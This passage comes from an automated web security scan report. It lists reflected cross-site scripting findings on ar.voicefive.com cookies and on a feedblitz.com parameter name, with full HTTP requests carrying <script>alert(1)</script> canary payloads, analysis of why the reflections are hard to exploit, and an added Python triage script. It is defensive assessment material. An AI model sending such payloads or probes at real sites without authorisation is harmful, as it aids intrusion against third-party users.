Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p67161473 cookie is copied into the application's response, which is served as application/x-javascript, inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object (not, as the scanner's template wording says, as plain text between HTML tags). The payload f143e<script>alert(1)</script>94af48f4fd5 was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.

This proof of concept shows that the cookie value is written into the script without any encoding. It does not show JavaScript execution: inside a string literal the echoed <script> tags are inert, and executing code would require the cookie value to close the string first (an unescaped single quote), which this test did not attempt and the report does not establish.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie for .voicefive.com (the domain used by the Set-Cookie headers below) in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability. Note, though, that a script resource executes in the origin of every page that includes it, so the impact of a working injection would fall on those pages rather than on ar.voicefive.com itself.

Request

GET /bmx3/broker.pli?pid=p68511049&PRAd=264243128&AR_C=186035359 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redcated/MRT/iview/264243128/direct;wi.640;hi.480/01?ENN_rnd=12964914777625&click=http://www.ectnews.com/adsys/link/%3Fcreative%3d7040%26ENN_rnd%3d12964914777625%26ENN_target=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&f143e<script>alert(1)</script>94af48f4fd5; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:09:05 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p68511049=exp=1&initExp=Mon Jan 31 17:09:05 2011&recExp=Mon Jan 31 17:09:05 2011&prad=264243128&arc=186035359&; expires=Sun 01-May-2011 17:09:05 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296493745; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25118

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264243128",Pid:"p68511049",Arc:"186035359",Location:
...[SNIP]...
();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&f143e<script>alert(1)</script>94af48f4fd5', "ar_p85001580": 'exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:
...[SNIP]...

1.301. http://ar.voicefive.com/bmx3/broker.pli [ar_p68511049 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p68511049 cookie is copied into the application's response, which is served as application/x-javascript, inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object (not, as the scanner's template wording says, as plain text between HTML tags). The payload d7fe7<script>alert(1)</script>4b32758c781 was submitted in the ar_p68511049 cookie. This input was echoed unmodified in the application's response.

This proof of concept shows that the cookie value is written into the script without any encoding. It does not show JavaScript execution: inside a string literal the echoed <script> tags are inert, and executing code would require the cookie value to close the string first (an unescaped single quote), which this test did not attempt and the report does not establish.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie for .voicefive.com (the domain used by the Set-Cookie headers below) in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability. Note, though, that a script resource executes in the origin of every page that includes it, so the impact of a working injection would fall on those pages rather than on ar.voicefive.com itself.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087570&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.22;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a/L46/1678441172/Top1/USNetwork/BCN2010110276_004_RadioShack/RadioShack_RTG_728.html/726348573830307044726341416f7670?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/RadioShack/SELL_2011Q1/RTG/728/L36/772729617/x90/USNetwork/RS_SELL_2011Q1_247_RTG_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=772729617?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; ar_p68511049=exp=1&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 16:31:23 2011&prad=264243128&arc=186035359&d7fe7<script>alert(1)</script>4b32758c781; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296491490%2E045%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:09:07 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=40&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Jan 31 17:09:07 2011&prad=58087570&arc=40401740&; expires=Sun 01-May-2011 17:09:07 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26753

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087570",Pid:"p85001580",Arc:"40401740",Location:CO
...[SNIP]...
Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=1&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 16:31:23 2011&prad=264243128&arc=186035359&d7fe7<script>alert(1)</script>4b32758c781' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

1.302. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p83612734 cookie is copied into the application's response, which is served as application/x-javascript, inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object (not, as the scanner's template wording says, as plain text between HTML tags). The payload 673c2<script>alert(1)</script>9d2284eef49 was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.

This proof of concept shows that the cookie value is written into the script without any encoding. It does not show JavaScript execution: inside a string literal the echoed <script> tags are inert, and executing code would require the cookie value to close the string first (an unescaped single quote), which this test did not attempt and the report does not establish.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie for .voicefive.com (the domain used by the Set-Cookie headers below) in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability. Note, though, that a script resource executes in the origin of every page that includes it, so the impact of a working injection would fall on those pages rather than on ar.voicefive.com itself.

Request

GET /bmx3/broker.pli?pid=p68511049&PRAd=264243128&AR_C=186035359 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redcated/MRT/iview/264243128/direct;wi.640;hi.480/01?ENN_rnd=12964914777625&click=http://www.ectnews.com/adsys/link/%3Fcreative%3d7040%26ENN_rnd%3d12964914777625%26ENN_target=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&673c2<script>alert(1)</script>9d2284eef49; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:09:06 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p68511049=exp=1&initExp=Mon Jan 31 17:09:06 2011&recExp=Mon Jan 31 17:09:06 2011&prad=264243128&arc=186035359&; expires=Sun 01-May-2011 17:09:06 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296493746; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25118

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264243128",Pid:"p68511049",Arc:"186035359",Location:
...[SNIP]...
t Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&673c2<script>alert(1)</script>9d2284eef49' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

1.303. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p85001580 cookie is copied into the application's response, which is served as application/x-javascript, inside a single-quoted JavaScript string literal in the COMSCORE.BMX.Broker.Cookies object (not, as the scanner's template wording says, as plain text between HTML tags). The payload 8b57b<script>alert(1)</script>41db85d668d was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.

This proof of concept shows that the cookie value is written into the script without any encoding. It does not show JavaScript execution: inside a string literal the echoed <script> tags are inert, and executing code would require the cookie value to close the string first (an unescaped single quote), which this test did not attempt and the report does not establish.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie for .voicefive.com (the domain used by the Set-Cookie headers below) in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability. Note, though, that a script resource executes in the origin of every page that includes it, so the impact of a working injection would fall on those pages rather than on ar.voicefive.com itself.

Request

GET /bmx3/broker.pli?pid=p68511049&PRAd=264243128&AR_C=186035359 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redcated/MRT/iview/264243128/direct;wi.640;hi.480/01?ENN_rnd=12964914777625&click=http://www.ectnews.com/adsys/link/%3Fcreative%3d7040%26ENN_rnd%3d12964914777625%26ENN_target=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&8b57b<script>alert(1)</script>41db85d668d; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:09:07 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p68511049=exp=1&initExp=Mon Jan 31 17:09:07 2011&recExp=Mon Jan 31 17:09:07 2011&prad=264243128&arc=186035359&; expires=Sun 01-May-2011 17:09:07 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296493747; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25118

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264243128",Pid:"p68511049",Arc:"186035359",Location:
...[SNIP]...
8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&8b57b<script>alert(1)</script>41db85d668d', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5
...[SNIP]...

1.304. http://www.feedblitz.com/f/f.fbz [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.feedblitz.com
Path:   /f/f.fbz

Issue detail

The name of an arbitrarily supplied request parameter is copied unencoded into the application's response twice: into the Location header of a 302 redirect, and into the response body, which opens with an <html> tag followed by what appears to be a second copy of the CGI response headers (Status, Location, Set-Cookie). The payload ff06e<script>alert(1)</script>ab996a5e6e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in both places.

This proof of concept shows that the parameter name is not encoded before it is written into the response; it does not by itself demonstrate script execution, because the response is never rendered.

Note that the response into which user data is copied is an HTTP redirection. Browsers navigate to the Location target without rendering the body of a redirect, so unless you can find a way to prevent the application from performing the redirection (for example, by interfering with the response headers), the body reflection is not exploitable in practice. This limitation considerably mitigates the impact of the vulnerability. Two follow-ups the report does not show are worth doing before writing the finding off: the canary travels into the redirect target (the same path over HTTPS), so that endpoint should be probed directly in case it reflects the parameter name into a page that is rendered; and because the value also lands in the Location header, only a probe containing CR/LF characters can tell whether line breaks are rejected there, which a <script> canary says nothing about.
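As an added example (not code from the CloudScan report and not FeedBlitz's code), the following Python script triages a captured response the way this finding needs: it parses the raw 302, records that the canary appears in the Location header and in the body, marks the body reflection as not rendered because the browser follows the redirect, flags that the body repeats the CGI headers, and extracts the redirect target so the next hop can be probed. The sample response is a constructed, trimmed copy of the one shown in this entry; the function and key names are the example's own.

```python
"""Added example (not part of the CloudScan report and not FeedBlitz's code):
triage a captured HTTP response for a reflected canary, separating what a
browser would render from what it would merely follow. SAMPLE_RESPONSE is a
constructed, trimmed copy of the 302 shown in the report; CANARY is the
scanner's payload from the same entry."""
import re

CANARY = "ff06e<script>alert(1)</script>ab996a5e6e3"
TARGET = "https://www.feedblitz.com/f/f.fbz?" + CANARY + "=1"
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Moved\r\n"
    "Connection: close\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "Location: " + TARGET + "\r\n"
    "Set-Cookie: Channel=\"1\"; path=/; domain=.feedblitz.com\r\n"
    "Content-Length: 2699\r\n"
    "\r\n"
    "<html>\r\n\r\n\r\n"
    "Status: 302 Moved\r\n"
    "Location: " + TARGET + "\r\n"
)

# header-style lines at the start of a body line: the CGI output leaking twice
HEADER_LINE = re.compile(r"^(Status|Location|Set-Cookie|Content-Type):", re.M)


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status, [(name, value)], body).
    Header names are lower-cased; no folding or chunked decoding is attempted."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers, body


def triage(raw, canary):
    """Report where the canary was reflected and whether each reflection is
    something a browser would actually process."""
    status, headers, body = parse_response(raw)
    header_hits = [name for name, value in headers if canary in value]
    location = next((v for n, v in headers if n == "location"), None)
    follows_redirect = 300 <= status < 400 and location is not None
    body_hit = canary in body
    return {
        "status": status,
        "header_hits": header_hits,
        "body_hit": body_hit,
        # a browser navigates to Location and never renders a redirect body,
        # so a body reflection there is inert on its own
        "body_renders": body_hit and not follows_redirect,
        # header reflection only becomes response splitting if the input can
        # carry a line break; a <script> canary proves nothing either way
        "header_injection": bool(header_hits) and ("\r" in canary or "\n" in canary),
        # the body of this 302 repeats the CGI headers after an <html> tag,
        # a sign the script's header output is being emitted twice
        "headers_leaked_into_body": HEADER_LINE.search(body) is not None,
        # the canary rides along into the redirect target, so the next hop
        # must be probed directly before the reflection is written off
        "retest_url": location if location and canary in location else None,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_RESPONSE, CANARY).items():
        print(f"{key}: {value}")
```

For the sample, triage reports header_hits ['location'], body_hit True but body_renders False, header_injection False, headers_leaked_into_body True, and retest_url set to the HTTPS target; changing only the status line to 200 OK flips body_renders to True, which is the difference between this entry and a directly exploitable reflection.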

Request

GET /f/f.fbz?ff06e<script>alert(1)</script>ab996a5e6e3=1 HTTP/1.1
Host: www.feedblitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved
Connection: close
Date: Mon, 31 Jan 2011 20:32:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://www.feedblitz.com/f/f.fbz?ff06e<script>alert(1)</script>ab996a5e6e3=1
Set-Cookie: perm=; expires=Fri, 20-May-2005 12:00:00 GMT; path=/; domain=.feedblitz.com
Set-Cookie: Token="954d46a4fd0078034307535a433072f0"; path=/; domain=.feedblitz.com
Set-Cookie: UserID=; expires=Fri, 20-May-2005 12:00:00 GMT; path=/; domain=.feedblitz.com
Set-Cookie: NextPage=; expires=Fri, 20-May-2005 12:00:00 GMT; path=/; domain=.feedblitz.com
Set-Cookie: Alias=; expires=Fri, 20-May-2005 12:00:00 GMT; path=/; domain=.feedblitz.com
Set-Cookie: Channel="1"; path=/; domain=.feedblitz.com
Content-Length: 2699

<html>


Status: 302 Moved
Location: https://www.feedblitz.com/f/f.fbz?ff06e<script>alert(1)</script>ab996a5e6e3=1
Set-Cookie: perm=; expires=Fri, 20-May-2005 12:00:00 GMT; path=/; domain=.feedblitz.com
Set-Cookie: Token="954d46a4fd0078034307535a433072f0"; path=/; domain=.feedblitz.com
Set-Cookie: UserID=; expir
...[SNIP]...
